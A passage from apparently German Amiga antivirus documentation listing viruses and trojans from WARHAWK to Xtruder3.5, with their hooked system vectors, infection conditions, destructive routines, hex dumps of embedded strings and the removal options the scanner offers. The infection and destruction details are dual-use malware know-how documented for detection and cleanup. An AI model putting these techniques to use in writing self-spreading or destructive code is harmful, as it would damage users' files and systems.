  7364.            Wert 0 erreicht wird, wird mit DisplayAlert ein Text ausge-
  7365.            geben. Dieser Text wird im Speicher decodiert mit:
  7366.                           eori.b #$a7,d0
  7367.               move.b d0,(a1)+
  7368.            Text:
  7369.            Hardware Failure    Press left mouse button to continue
  7370.                    Guru Meditation    #00000015.00C03L12
  7371.                    Hooligen-Bits randalieren im Datenbus!
  7372.                                                       Gruß Erich!
  7373.  
  7374.    - Warhawk   Cool, im Prg. DoIo, liegt immer ab $7e600
  7375.          Fordert trackdisk.device nicht
  7376.          Clone: 04.03.92  Text entfernt
  7377.          Clone: RAF-Virus, LOVEMACHINE-Virus, MAAS  s.o.
  7378.          Das Virusteil sichert den eigenen Speicherbereich NICHT. Es
  7379.          kann also ueberschrieben werden.
  7380.          Im BB ist zu lesen:
  7381.                         5741 52484157 4b205341       WARHAWK SA
  7382.            5953203a 204b494c 4c494e47 20594f55 YS : KILLING YOU
  7383.  
  7384.    - Warshaw Avenger   BeginIo, KickTag, KickChechSum, SumKickData
  7385.          grosse Aehnlichkeiten mit Lamer, BB aber unverschluesselt
  7386.          schreibt je nach Zaehlerstand BB oder schreibt in einen
  7387.          Diskblock (Lage je nach $dff006) $55 x Warsaw und 1 x !! .
  7388.  
  7389.    - WAWE-Trojan
  7390.          Ueberschreibt user.data
  7391.          Keine verbogenen Vektoren
  7392.          Wurde mit der HunkLab-Methode (s.o.) an MACK angehaengt.
  7393.          Im File ist zu lesen:
  7394.            00000003 57415745 22390000 00984eae ....WAWE"9....N.
  7395.            ffdc224e 2c790000 00044eae fe62203c .."N,y....N..b <
  7396.            00000000 4e754e75 00000000 75736572 ....NuNu....user
  7397.            2e646174 6100646f 732e6c69 62726172 .data.dos.librar
  7398.          Das Wort "WAWE" ergibt sich zufaellig durch zwei Befehle.
  7399.          Zerstoerung:
  7400.          Es wird nach user.data gesucht und dieses File dann mit
  7401.          Speichermuell (Lage abhaengig von $DFF006) ueberschrieben.
  7402.          Das File ist NICHT zu erkennen und kann auch NICHT gerettet
  7403.          werden.
  7404.          VT bietet Ausbau an und es sollte ein lauffaehiges MACK-
  7405.          File uebrig bleiben.
  7406.  
  7407.    - WBPrefs-Virus   File
  7408.          siehe oben bei 666!-Trojan
  7409.  
  7410.    - WECH-LVirus      File  Link und Zerstoerung
  7411.          Fileverlaengerung: 952 Bytes
  7412.          Verbogener Vektor: LoadSeg
  7413.          Zusaetzlich wird auch LastAlert veraendert
  7414.          Resetfest: Nein
  7415.          Link hinter den ersten Hunk.
  7416.          VT versucht Loadseg im Speicher zurueckzusetzen.
  7417.          VT versucht den Linkteil aus einem File auszubauen.
  7418.          Speicherverankerung:
  7419.            - LastAlert geaendert auf 00FFFFFF, 01FFFFFF, 02FFFFFF usw.
  7420.            - LoadSeg wird verbogen
  7421.          Zerstoerung (mit Absicht):
  7422.            Sobald LastAlert und $DFF006 einen bestimmten Wert haben, wird
  7423.            der Fileanfang ueberschrieben.
  7424.            picture.datatype-zerst:
  7425.             00: 57454348 57454348 57454348 57454348 WECHWECHWECHWECH
  7426.             10: 57454348 57454348 57454348 57454348 WECHWECHWECHWECH
  7427.             20: 57454348 57454348 57454348 00040000 WECHWECHWECH....
  7428.            Diese Files koennen NICHT gerettet werden.
  7429.          Vermehrungsbedingungen:
  7430.            - File ist noch nicht verseucht (Test mit SetComment)
  7431.            - Filename enthaelt nicht "-",".l"
  7432.            - File ausfuehrbar (3F3)
  7433.            - 3E9-Hunk wird gefunden
  7434.            - Einbauvarianten des Sprungs in das LinkTeil:
  7435.              - RTS am Hunkende soll zu NOP werden (im Test NIE gelungen)
  7436.              - RTS 0000 am Hunkende wird zu NOPNOP
  7437.              - RTS nicht genau am Hunkende wird zu Bra.s
  7438.              - 4EAEwxyz im Hunk wird zu 4EBA-Virus
  7439.          Das Teil meldet sich nicht.
  7440.          Hinweise:
  7441.            - Eine Syquest war nach 15 Minuten unbrauchbar.
  7442.            - Beim gewollten Linkvorgang entstanden Files OHNE Sprungbe-
  7443.              fehl.                                          
  7444.            - Beim gewollten Linkvorgang entstanden Files mit defektem
  7445.              Linkteil.
  7446.            - Kein Test auf KS1.3 (LoadSeg)
  7447.            - Verwendet ungerade Adressen
  7448.            - Verwechselt wahrscheinlich $80(FIBlock) mit $7c(FIBlock)
  7449.              Vermutung insgesamt: Anfaenger ?????
  7450.  
  7451.    - WiREFACE-Varianten nach VT:
  7452.          Meist wird mit der 4EB9-Methode gearbeitet. Der Name WiREFACE
  7453.          wurde aus den decodierten Texten abgeleitet. Eine Ausnahme:
  7454.          in ComKiller ist zu lesen WIREFIRE
  7455.            - Typ A
  7456.              Trojanteil allein 2 Hunks     5852 Bytes
  7457.              neue Files                      ?? Bytes
  7458.              bekannter Filename:
  7459.               - MakeKey                  9088 Bytes
  7460.            - Typ B
  7461.              Trojanteil allein 2 Hunks     5944 Bytes
  7462.              neue Files                      99 Bytes
  7463.              bekannter Filename:
  7464.               - ScanLink                 8040 Bytes
  7465.            - Typ C
  7466.              Trojanteil allein 2 Hunks     1880 Bytes
  7467.              neue Files                      97 Bytes
  7468.              bekannte Filenamen:
  7469.               - VirusChecker V6.60      52400 Bytes
  7470.               - HDToolBox V40.9        106508 Bytes
  7471.               - LZX1.20Turbo            83660 Bytes  
  7472.            - Typ D
  7473.              Trojanteil allein 2 Hunks     7108 Bytes
  7474.              neue Files                     469 und 0 Bytes
  7475.              bekannter Filename:
  7476.               - AECrack                  7924 Bytes   
  7477.            - Typ E
  7478.              Trojanteil allein 2 Hunks      588 Bytes
  7479.              neue Files                      64 und 0 Bytes
  7480.              bekannte Filenamen:   
  7481.               - DarkroomIntro           32344 Bytes
  7482.               - SetBufVirus              1096 Bytes   
  7483.            - Typ F
  7484.              zerstoert Rigid-Bereich
  7485.              bekannter Filename:   
  7486.               - CheckMount               4672 Bytes
  7487.  
  7488.    - WiREFACE-Trojan   File  (format sys:)
  7489.         Typ A:
  7490.         Laenge: 9088 Bytes
  7491.         Filename: MakeKey  (fuer Virus_Checker)
  7492.         VT bietet Loeschen an.
  7493.         Verwendet wurde die 4EB9-Methode. Der erste Link wurde gepackt.
  7494.         Im entpackten Link koennen Sie lesen:
  7495.            57695245 46414345 202f2064 454d4f4e WiREFACE / dEMON
  7496.            53206f46 20744845 2070454e 54414752 S oF tHE pENTAGR
  7497.            414d202a 20574869 50504544 20594f55 AM * WHiPPED YOU
  7498.            52204844 2c205355 4b4b4148 20212120 R HD, SUKKAH !!
  7499.            5765204c 6f6f6b20 446f776e 20596f75 We Look Down You
  7500.            72204e6f 73652028 4c617567 68746572 r Nose (Laughter
  7501.            29210a00 7379733a 00007379 733a0000 )!..sys:..sys:..
  7502.            536e7570 70210000 7379733a 00007379 Snupp!..sys:..sy
  7503.            733a7072 75707025 64007379 733a6261 s:prupp%d.sys:ba
  7504.            6a732564 00007379 733a6b69 73732564 js%d..sys:kiss%d
  7505.            00007379 733a706f 74746125 64007379 ..sys:potta%d.sy
  7506.            733a0000 7379733a 0000536e 75707021 s:..sys:..Snupp!
  7507.         Ablauf:
  7508.         - sys: wird schnell formatiert mit dem Namen Snupp!
  7509.         - Danach sollen neue Files mit Zahlen (teilweise bis 1000)
  7510.           geoeffnet werden (also z.B. prupp46 usw.).
  7511.           Wenn Sie jetzt einen SystemRequester sehen, haben Sie "Glueck".
  7512.           Der Programmierer hat eine "Kleinigkeit" uebersehen. Ver-
  7513.           suchen Sie mit Disksalv eine Rettung.
  7514.         - Falls die Files angelegt werden (bei mir NICHT), duerfte
  7515.           die Partition verloren sein.
  7516.           Falls die Files angelegt wurden, erfolgt danach
  7517.           (hab "einfach" die Requester weggeklickt)
  7518.         - ein Schreiben nach Block 0  Inhalt $feeffeef  Folge: NoDos
  7519.            0000: feeffeef 00000000 00000000 00000000 ................
  7520.            0010: 00000000 00000000 00000000 00000000 ................
  7521.         - und eine Endlos-Textausgabe ( WiREFACE...(Laughter)! ) im
  7522.           Cli . Es hilft nur ein Tastatur-Reset
  7523.         Typ B:
  7524.         Laenge: 8040 Bytes
  7525.         Filename: ScanLink  (testet angeblich auf Linkviren)
  7526.         VT bietet Loeschen an.
  7527.         Verwendet wurde die 4EB9-Methode. Der erste Link wurde gepackt.
  7528.         Im entpackten Link koennen Sie lesen: 
  7529.                                       57695245             WiRE
  7530.            46414345 202f2064 454d4f4e 53206f46 FACE / dEMONS oF
  7531.            20744845 2070454e 54414752 414d202a  tHE pENTAGRAM *
  7532.            20574869 50504544 20594f55 52204844  WHiPPED YOUR HD
  7533.            2c205355 4b4b4148 20212120 5765204c , SUKKAH !! We L
  7534.            6f6f6b20 446f776e 20596f75 72204e6f ook Down Your No
  7535.            73652028 4c617567 68746572 29210a00 se (Laughter)!..
  7536.            7379733a 00007379 733a0000 57695245 sys:..sys:..WiRE
  7537.            46414345 00007379 733a0000 57695245 FACE..sys:..WiRE
  7538.            46414345 3a707275 70702564 00005769 FACE:prupp%d..Wi
  7539.            52454641 43453a62 616a7325 64005769 REFACE:bajs%d.Wi
  7540.            52454641 43453a47 4f442753 2041524d REFACE:GOD'S ARM
  7541.            59202d20 444f5020 2d202564 00005769 Y - DOP - %d..Wi
  7542.            52454641 43453a70 6f747461 25640000 REFACE:potta%d..
  7543.            57695245 46414345 3a005769 52454641 WiREFACE:.WiREFA
  7544.            43453a00 536e7570 70210000 6468313a CE:.Snupp!..dh1:
  7545.            00006468 313a0000 506c7570 70210000 ..dh1:..Plupp!..
  7546.            6468303a 00006468 303a0000 466c7570 dh0:..dh0:..Flup
  7547.            70210000                            p!..
  7548.         Bei Typ B sind also dh0: und dh1: dazugekommen. Leider wurde
  7549.         auch der Fehler nach der Format-Routine gefunden. Die Fuell-
  7550.         Files werden jetzt wirklich angelegt.
  7551.         Beispiel:
  7552.            prupp98        Laenge: 99
  7553.            57695245 46414345 202f2064 454d4f4e WiREFACE / dEMON
  7554.            53206f46 20744845 2070454e 54414752 S oF tHE pENTAGR
  7555.            414d202a 20574869 50504544 20594f55 AM * WHiPPED YOU
  7556.            52204844 2c205355 4b4b4148 20212120 R HD, SUKKAH !!
  7557.            5765204c 6f6f6b20 446f776e 20596f75 We Look Down You
  7558.            72204e6f 73652028 4c617567 68746572 r Nose (Laughter
  7559.            29210a                              )!.
  7560.         Die Laenge der Fuellfiles aendert sich (z.B. bajs0 ueber 200000).
  7561.         Sie enthalten dann den Text (s.o.) und Speichermuell.
  7562.         Wenn Sie also nicht sehr schnell reagieren, ist auch mit Disk-
  7563.         salv nichts mehr zu retten.
  7564.         Das erste bearbeitete Laufwerk (sys:) heisst jetzt WiREFACE.
  7565.         Typ C:
  7566.         Anderer moeglicher Name: Alfons-Eberg-2.0-Trojan  siehe in Dump
  7567.         Zerstoerung HD0: mit 68040 gelungen.
  7568.         Bekannte Filenamen:
  7569.          - VirusChecker V6.60  Laenge: 52400 Bytes
  7570.          - HDToolBox V40.9     Laenge: 106508 Bytes
  7571.          - LZX1.20Turbo        Laenge: 83660 Bytes
  7572.         VT bietet nur Loeschen an, da die Programme in DER Versions-
  7573.         nummer im Juli 95 NICHT existieren.
  7574.         Verwendet wurde die 4EB9-Methode. Zusaetzlich wurde beim HDTOOL-
  7575.         Box-File noch ein 3E8-*Art-Hunk davorgelinkt.
  7576.         Betroffene Medien sollen jetzt sein:
  7577.         BBS, DH0, DH1, DH2, DH3, DH4, DH5, D0H0, SYS und NCOMM
  7578.            CP17           Laenge: 97 Bytes
  7579.            414c464f 4e5320c5 42455247 20566952 ALFONS .BERG ViR
  7580.            55532076 322e3020 df657461 20627920 US v2.0 .eta by
  7581.            57695245 46414345 202f2064 454d4f4e WiREFACE / dEMON
  7582.            53206f46 20744845 2070454e 54414752 S oF tHE pENTAGR
  7583.            414d2c20 64656469 63617465 6420746f AM, dedicated to
  7584.            2028436f 726e2946 6c616b65 2f545253  (Corn)Flake/TRS
  7585.            49                                  I
  7586.         Die Laenge der Fuellfiles aendert sich (z.B. harharhar 100000).
  7587.         Sie enthalten dann den Text (s.o.) und Speichermuell.
  7588.         Wenn Sie also nicht sehr schnell reagieren, ist auch mit Disk-
  7589.         salv nichts mehr zu retten.
  7590.         Typ D:
  7591.         Filename: AECrack
  7592.         Laenge: 7924 Bytes
  7593.         Nach FileID: CRACK AMIEXPRESS PASSWORDS
  7594.         VT bietet nur Loeschen an.
  7595.         Am Anfang haengt ein 3E8-*ART-Hunk
  7596.         Nach dem Entpacken erkennt man, dass mit der 4EB9-Methode zwei
  7597.         GLEICHE wieder gepackte Teile zusammengelinkt wurden.
  7598.         Im entpackten Teil ist zu lesen:  
  7599.                                       00002d21 p.L.@.Nu%s%s..-!
  7600.            2d576952 45464143 452d212d 00005359 -WiREFACE-!-..SY
  7601.            533a0000 5359533a 2d212d57 69524546 S:..SYS:-!-WiREF
  7602.            4143452d 212d0000 4448303a 00004448 ACE-!-..DH0:..DH
  7603.            303a2d21 2d576952 45464143 45206445 0:-!-WiREFACE dE
  7604.            4d4f4e2d 212d0000 4242533a 00004242 MON-!-..BBS:..BB
  7605.            533a2d21 2d64454d 4f4e2057 69524546 S:-!-dEMON WiREF
  7606.            4143452d 212d0000 4448313a 00004448 ACE-!-..DH1:..DH
  7607.            313a2d21 2d576952 45464143 45207045 1:-!-WiREFACE pE
  7608.            4e544147 52414d2d 212d0000          NTAGRAM-!-..
  7609.         Ablauf:
  7610.          Die Format-Routine ist weggefallen.
  7611.          Betroffene Medien: SYS:, DH0:, BBS: und DH1: (s.o.)
  7612.          Es wird ein File (Laenge: 469, Name bei SYS: -!-WiREFACE-!-)
  7613.          angelegt. Inhalt:
  7614.            WiREFACE / dEMONS oF THE PENTAGRAM presents... (tadaa)
  7615.            'KLiA MiG PÅ NUPPEN' TROjAN (SUPER BETA RELEASE(BETA BETA CODE))
  7616.            usw.
  7617.          ALLE anderen Files des Laufwerks werden auf die Laenge 0 gesetzt.
  7618.          Am Schluss wird im cli in einer Endlosschleife der Text, der auch
  7619.          ins File geschrieben wird, ausgegeben.
  7620.         Typ E:
  7621.         Filename:DarkroomIntro
  7622.         Laenge: 32344 Bytes
  7623.         oder
  7624.         Filename: SetBufVirus
  7625.         Laenge:  1096 Bytes   (gepackt aber nicht gelinkt ???)
  7626.         VT bietet nur loeschen an.
  7627.         Mit der 4EB9-Methode wurde ein Trojanteil und ein Intro von 1994
  7628.         zusammengelinkt. Beide Teile sind gepackt:
  7629.         Im entpackten 1.Link ist zu lesen:
  7630.                                           733a               s:
  7631.            00006465 76733a00 6c696273 3a006c3a ..devs:.libs:.l:
  7632.            0000256c 7364454d 4f4e5320 6f462074 ..%lsdEMONS oF t
  7633.            48452070 454e5441 4752414d 21002a2a HE pENTAGRAM!.**
  7634.            2aae3043 6b276e27 ae304c4c 2054ae30 *.0Ck'n'.0LL T.0
  7635.            6a414e2a 2a2a2062 79205769 52454641 jAN*** by WiREFA
  7636.            4345202f 20644f50 21202d54 6f204845 CE / dOP! -To HE
  7637.            4c4c2057 69746820 7961276c 6c210000 LL With ya'll!..
  7638.         Ablauf:
  7639.          Betroffene Verzeichnisse: s, devs, libs, l
  7640.          In diese Verzeichnisse wird ein 64 Bytes langes File mit dem
  7641.          Namen dEMONS oF tHE pENTAGRAM! geschrieben. Textinhalt:
  7642.          ***... usw. s.o.
  7643.          Die restlichen Files in den Verzeichnissen werden auf die
  7644.          Laenge 0 gesetzt.
  7645.         Typ F:
  7646.         Filename:CheckMount
  7647.         Laenge: 4672 Bytes
  7648.         Laut Dok: Mount-972 Virus Checker
  7649.         Vor dem gepackten File sitzt ein 3E8-*Art-Hunk.
  7650.         Im entpackten File ist zu lesen:
  7651.            00000000 73637369 2e646576 69636500 ....scsi.device.
  7652.            69636464 69736b2e 64657669 6365006f icddisk.device.o
  7653.            6b746167 6f6e2e64 65766963 6500536f ktagon.device.So
  7654.            66745343 53495f4f 6b746167 6f6e4339 ftSCSI_OktagonC9
  7655.            582e6465 76696365 00285472 6f6a616e X.device.(Trojan
  7656.            4e616d65 3a20694c 534b4e41 20414e44 Name: iLSKNA AND
  7657.            52454153 2076312e 31292057 69524546 REAS v1.1) WiREF
  7658.            41434520 2f206445 4d4f4e53 206f4620 ACE / dEMONS oF
  7659.            74484520 70454e54 41475241 4d207374 tHE pENTAGRAM st
  7660.             ;...
  7661.            210a0000 6e756767 65744064 61746170 !...nugget@datap
  7662.            686f6e65 2e73650a 0000436f 756c646e hone.se...Couldn
  7663.         Ablauf:
  7664.          Im cli wird immer wieder nugget@dataphone.se ausgegeben.
  7665.          Gleichzeitig wird nach bestimmmten devices (s.o.) gesucht.
  7666.         Schaden beim Test:
  7667.          Der Rigid-Bereich wurde mit Speichermuell vollgeschrieben.
  7668.          Danach stand der Rechner. Es waere keine schlechte Idee
  7669.          vom Rigid-Zylinder ein Backup zu haben (z.Zyl/backup).
  7670.          Mit z.Zyl/restore konnte die Festplatte ohne Verlust
  7671.          reaktiviert werden. Vorher musste selbst in der hdtoolbox
  7672.          der Festplattentyp festgelegt werden.
  7673.        Hinweis 09.09.96:
  7674.          Ein AntiVirusPrg. erkennt im Moment in dem File mit dem
  7675.          Namen INTRO.EXE  (L:74036) ein Wireface-Teil. Es handelt
  7676.          sich hierbei um eine FEHLERKENNUNG !!!! Fehler wurde im
  7677.          Fruehjahr 1998 erkannt und von dem neuen Programmierer des
  7678.          Antivirusprogramms behoben.
  7679.  
  7680.    - WIREFIRE-Trojan   gegen BBS
  7681.         Filename: Comkiller1.6
  7682.         Laenge: 4604 Bytes
  7683.         Nach FileID: Command Virus Killer/Scanner V1.6
  7684.         In Wirklichkeit sind mit der 4EB9-Methode zwei Teile zusammenge-
  7685.         linkt.
  7686.         VT bietet nur Loeschen an, da ich ein Version 1.6 nicht kenne.
  7687.         Im entpackten 1. Link ist zu lesen:
  7688.            68696869 68690057 49524546 49524500 hihihi.WIREFIRE.
  7689.            6262733a 00626273 00626273 00ff0053 bbs:.bbs.bbs...S
  7690.               ;....
  7691.            3a746573 742e6461 74610062 62733a6e :test.data.bbs:n
  7692.            6f646534 2f706c61 7970656e 2f707374 ode4/playpen/pst
  7693.            2d666f72 2e747874 00626273 3a6e6f64 -for.txt.bbs:nod
  7694.               ;usw.
  7695.         Soll user.data auslesen und ablegen.
  7696.         Fuer User ohne Mailbox kaum Gefahr.
  7697.  
  7698.  
  7699.    - X-Fucker-Virus   File   Link- UND Zerstoerungsroutine
  7700.          Verbogene Vektoren: Open und LoadSeg
  7701.          Nicht Resetfest
  7702.          Duerfte mit KS1.3 Probleme haben.
  7703.          Verlaengert ein File um 828 Bytes.
  7704.          Zu Beginn eines verseuchten Files ist zu lesen:
  7705.            0000: 000003f3 00000000 00000001 00000000 ................
  7706.            0010: 00000000 00000411 000003f1 00000003 ................
  7707.            0020: 2f582046 75636b65 72000000 000003e9 /X Fucker.......
  7708.          Also ein 3F1-Hunk !!!!!!!!!!!!
  7709.          Schreibt Z nach $0, um zu erkennen, dass das Teil schon im
  7710.          Speicher ist.
  7711.          Schaeden:
  7712.          Bei Open:
  7713.          Test auf Systemzeit mind. 21.Feb.95
  7714.          Falls nein: Original-Open
  7715.          Test auf BBS: im Pfad      (also nur gegen BBS)
  7716.          Falls nein: Original-Open
  7717.          Es wird Mode NewFile gesetzt. Dies soll das Loeschen des Files
  7718.          im BBS-Bereich bewirken.
  7719.          Bei LoadSeg:
  7720.          KEIN Test auf BBS (also kann jeder betroffen sein)
  7721.          Test auf File hat nur 1 Hunk
  7722.          Falls nein: Original-LoadSeg
  7723.          Test auf 3F1-Hunk
  7724.          Falls ja: Original-LoadSeg
  7725.          Damit soll ein Mehrfachbefall vermieden werden.
  7726.          Ablauf:
  7727.          Es wird vorne ein 3F1-Hunk angehaengt. Laenge 20 Bytes
  7728.          Danach wird zu Beginn des ersten Hunks das eigentliche Virus-
  7729.          teil geschrieben. Laenge 808 Bytes
  7730.          Dann wird nach $3EC (reloc) gesucht. Falls nein: Ende der Ver-
  7731.          seuchung. Falls ja: Veraenderung von Reloc und im File. Ein
  7732.          echtes Abenteuer (Programmierer mit WENIG Ahnung).
  7733.          Bei Tests hat sich gezeigt, dass sehr viele Files defekt sind.
  7734.          z.B. $3F2 am Ende fehlt, falscher Umgang mit Chip-Hunk usw.
  7735.          Bei solchen Files verweigert VT den Ausbau und bietet nur
  7736.          Loeschen an. Bei "guten" Files versucht VT den Ausbau.
  7737.          VT sollte das Virusteil auch im Speicher erkennen.
  7738.  
  7739.  
  7740.    - XaCa-D.Killer    Disk-Killer Clone  s.o.
  7741.          Laenge PP-gepackt: 1440 Bytes
  7742.          Laenge ungepackt : 1368 Bytes
  7743.          Filename: disktest
  7744.          Jemand hat es wieder einmal geschafft, einen Text zu aendern.
  7745.          Tut mir leid, die Muehe war umsonst.
  7746.          Im entpackten File ist zu lesen:
  7747.            20205861 4361206c 756d6d69 6e205631   XaCa lummin V1
  7748.            2e352020 200a2020 20202020 20202020 .5   .
  7749.            20202020 20202020 20202020 20202020
  7750.            20202020 20200a43 41544348 204d4520       .CATCH ME
  7751.            49462059 4f552043 414e2120 47524820 IF YOU CAN! GRH
  7752.            usw.
  7753.       
  7754.    - xcom-Insta.      File  Installer
  7755.          Filename: version.library
  7756.          Laenge: #900 Bytes
  7757.          Im File ist zu lesen:
  7758.            7273696f 6e2e6c69 62726172 79007665 rsion.library.ve
  7759.            7273696f 6e203430 2e343320 2832332e rsion 40.43 (23.
  7760.            342e3934 290d0a00 0000002a 00000058 4.94)......*...X
  7761.          Diese Versionsnummer kenne ich nicht. Meine Original-version-
  7762.          .library ist nur #272 Bytes lang.
  7763.          VT bietet Loeschen an. Kopieren Sie danach von Ihrer
  7764.          Original-WB-Disk die version.library wieder auf.
  7765.          Das xcom-Teil ist hier codiert eingebaut, vermehrt sich
  7766.          dann aber uncodiert (siehe unten).
  7767.  
  7768.    - xcom-LVirus      File  Link
  7769.          vgl. auch HappyNewYear96
  7770.          ab KS2.04: ja   (Versionsabfrage auf mind. #37)
  7771.          Namensbegruendung:  im Linkteil ist uncodiert zu lesen:  
  7772.             f00ab240 6d047001 4e757000 4e757863 ...@m.p.Nup.Nuxc
  7773.             6f6d48e7                            omH.          ^^
  7774.              ;.....                             ^^
  7775.             0029646f 732e6c69 62726172 7900abcd .)dos.library...
  7776.                                        ^^^^^^^^
  7777.          Verbogener Vektor: LoadSeg
  7778.          Resetfest: Nein
  7779.          Fileverlaengerung: 576 Bytes
  7780.          Link hinter den ersten Hunk.
  7781.          Test ob LoadSeg schon verbogen
  7782.          Aktivierung in Abhaengigkeit von $DFF006 und $DFF00A (neu)
  7783.          VT versucht Loadseg im Speicher zurueckzusetzen.
  7784.          VT versucht den Linkteil aus einem File auszubauen.
  7785.          Vermehrungsbedingungen:
  7786.            - File ist noch nicht verseucht (1 LW-Test)
  7787.            - Filename enthaelt nicht ".l" oder "-"
  7788.            - max. Filelaenge #124000 Bytes
  7789.            - min. Filelaenge #2400 Bytes
  7790.            - 3E9-Hunk wird gefunden
  7791.            - Disk validated
  7792.            - mind. 4 Block frei
  7793.            - RTS wird gefunden  ( max. loop $3F )
  7794.            - RTS wird ersetzt durch bra.s oder NOP
  7795.          Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!!
  7796.          Das Teil meldet sich nicht.
  7797.          Hinweis:
  7798.          Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit
  7799.          dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen
  7800.          wird dadurch geringer.
  7801.  
  7802.  
  7803.    - XCOPY2-BB   eigentlich ein Anti-BB  sehen Sie deshalb unten
  7804.          Dort gehoert er eigentlich auch nicht hin, da er nicht nach
  7805.          Viren sucht, aber ich wollte den BB in diesem Dokument behal-
  7806.          ten und nicht nach "andere BB" auslagern
  7807.  
  7808.    - XCopyPro6.5-Trojan
  7809.          Erzeugt beim Starten von XCopyPro V6.5  (Laenge:28336)
  7810.          den BB  Little Sven
  7811.          Hinweis: im April 92 lag die OrigVersionsNr. von Xcopy erst
  7812.             bei 5.2x (glaub ich).
  7813.          Gefunden in: xcopy65e.lha  Laenge: 25360
  7814.          VT bietet Ausbau an.
  7815.  
  7816.    - XENO     Link-Virus, verlaengert das befallene Prg. um 1124 Bytes
  7817.          verbiegt DosOpen, DosLock und DosLoadSeg
  7818.          erhoeht Hunk-Zahl im File-Header nicht !!!
  7819.          testet vor Befall Filenamen auf 0-9, a-z und A-Z,
  7820.          Folge: Programme, deren Namen SonderZeichen enthalten, werden
  7821.          n i c h t  befallen.
  7822.          Ausserdem werden  a l l e  Prg., die im Unterverzeichnis
  7823.          l oder devs stehen, n i c h t  verseucht.
  7824.  
  7825.          Textausgabe (Output, Write) in Abhaengigkeit von $DFF006
  7826.          Text wird erst zur Ausgabe decodiert ( eori.b #-$80,(a0)+ ) :
  7827.             Greetings Amiga user from the Xeno virus!
  7828.          in einem verseuchten File ist in der Naehe von $460 mit einem
  7829.          Monitor zu sehen:
  7830.                l.devs.fastfilesystem.
  7831.  
  7832.    - XENO a    kleine Veraenderung um AntiVirusPrg.e zu taeuschen
  7833.          09.03.92
  7834.          Nachtrag 02.11.92: mehrere Xeno-links ans gleiche File sollten
  7835.          in einem Durchgang ausgebaut werden.
  7836.  
  7837.    - XENO-nichtlauff   File
  7838.          Kleine Veraenderung um AntiVirusPrg.e zu taeuschen.
  7839.          Aber der Zusammenhang zwischen Hunkanzahl und notwendigen Hunk-
  7840.          laengenangaben scheint nicht klar zu sein (Anfaenger).
  7841.          Das File ist NIE lauffaehig.
  7842.          Amiga-Dos meldet:  Error code 121
  7843.                             Bad loadfile hunk
  7844.          VT bietet loeschen an.
  7845.  
  7846.    - Xerox = DIGITAL AGE = Forpib-Clone
  7847.          nur Text geaendert
  7848.  
  7849.    - XLINK  V3.0  File
  7850.          VT glaubt ein File gefunden zu haben, das mit XLINK erzeugt
  7851.          wurde. Es handelt sich angeblich um ein Szenen-Programm, mit
  7852.          dem 2 ausfuehrbare Programm-Files zu 1 File zusammengelinkt
  7853.          werden koennen. Also geeignet fuer VirenProduktion !!!
  7854.          Muss aber NICHT immer negativ verwendet werden. VT sucht in
  7855.          dem File NICHT nach Viren-Mustern. Sie muessen selbst eine
  7856.          Entscheidung treffen.
  7857.          HINWEIS ab VT2.54 :
  7858.          Sie koennen jetzt im File-Requester Teil 1 oder 2 abschalten.
  7859.          Link1aus - schaltet den Programmteil 1 ab.
  7860.          Link2aus - schaltet den Programmteil 2 ab.
  7861.          Dies kann natuerlich nur ein NOTNAGEL sein. Besser ist es, wenn
  7862.          Sie mir das verseuchte Teil zuschicken und noch mehr erleichtern
  7863.          Sie mir meine Arbeit, falls Sie zufaellig das Programm auch im
  7864.          ungelinkten Zustand besitzen.
  7865.          Bitte fertigen Sie sich von dem gelinkten Programm zwei ver-
  7866.          schiedene Namenskopien auf einer sonst leeren Disk an. Schalten
  7867.          Sie danach an Kopie 1 den Link 1 ab und an Kopie 2 den Link 2 ab.
  7868.          Wenn Sie Glueck haben, ist ein lauffaehiges Programm dann ohne
  7869.          Virusteil oder ohne Intro !!
  7870.          Aber !!!  Es ist auch moeglich, dass das Haupt-Programm NICHT
  7871.          mehr laeuft. Warum ?  Beispiel:
  7872.          Eine Gruppe hat ein Intro vor ein Spiel gelinkt. Dann koennen
  7873.          in diesem Intro schon Veraenderungen am Computer (FastRam ab-
  7874.          schalten usw.) vorgenommen werden, die das Spiel voraussetzt.
  7875.          Ohne das Intro ist das Spiel dann logischerweise nicht lauf-
  7876.          faehig. MERKE: Ein so veraendertes File gibt man NICHT weiter!!!
  7877.  
  7878.    - XPRZSPEED-Virus   anderer Name: ZSPEED-Virus    s.u.
  7879.  
  7880.    - Xtruder3.5-Trojan    Zerstoerung
  7881.          Filelaenge: 183700 Bytes
  7882.          Notwendig: Xtruder.key   (als Faelschung)
  7883.                     (sonst nur bei "sehr unguenstigen" Bedingungen)
  7884.          Nicht Resetfest
  7885.          Verbogener Vektor: Keine
  7886.          Zerstoerung: Veraendert Filelaengen auf SYS:
  7887.          Empfehlung: Sofort Loeschen
  7888.          Im File ist zu lesen:
  7889.           4e004c3a 58747275 6465722e 6b657900 N.L:Xtruder.key.
  7890.           58747275 6465722e 6b657900 23352041 Xtruder.key.#5 A
  7891.           6c657820 486f6c73 7400533a 00005359 lex Holst.S:..SY
  7892.           533a5072 6566732f 456e762d 61726368 S:Prefs/Env-arch
  7893.           69766500 433a0000 5359533a 00006100 ive.C:..SYS:..a.
  7894.         Test: Ich stelle fest, dass ich WEDER ein Original-key.file NOCH
  7895.           ein FALSCHES key.file besitze. Es geht auch auf einem anderen
  7896.           Weg.
  7897.           Nach Xtruder3.5-Aufruf:
  7898.         Pfad  SDH0:
  7899.         VTFlush2
  7900.                  0
  7901.           FileL 0?
  7902.             ;.....
  7903.         l/Bootblock.brainfile
  7904.                  0
  7905.           FileL 0?
  7906.             ;.....
  7907.         c/AddBuffers
  7908.                  0
  7909.           FileL 0?
  7910.             ;.....
  7911.         libs/xtruder.library
  7912.                  0
  7913.           FileL 0?
  7914.             ;.....  
  7915.         devs/system-configuration
  7916.                  0
  7917.           FileL 0?
  7918.             ;.....
  7919.         Es wurden also alle Filelaengen (auch in SubDirs) auf 0 gesetzt.
  7920.  
  7921.         Stellungnahme des Programmierers im Netz:
  7922.           *** area : VIRUS_AMY                Date: 30 Jun 97 20:40:01
  7923.           *** from : Martin Wulffeld (39:141/124.53)
  7924.           *** to   : All
  7925.           *** about: Xtruder 3.5
  7926.           Hi
  7927.           As some of you may know Xtruder 3.5 has done a bit of damage
  7928.           to peoples files. However, it has only affected those people
  7929.           who used a fake keyfile and hopefully also the criminal
  7930.           B---- P------- (2:---/--) who still owes my friend Alex Holst
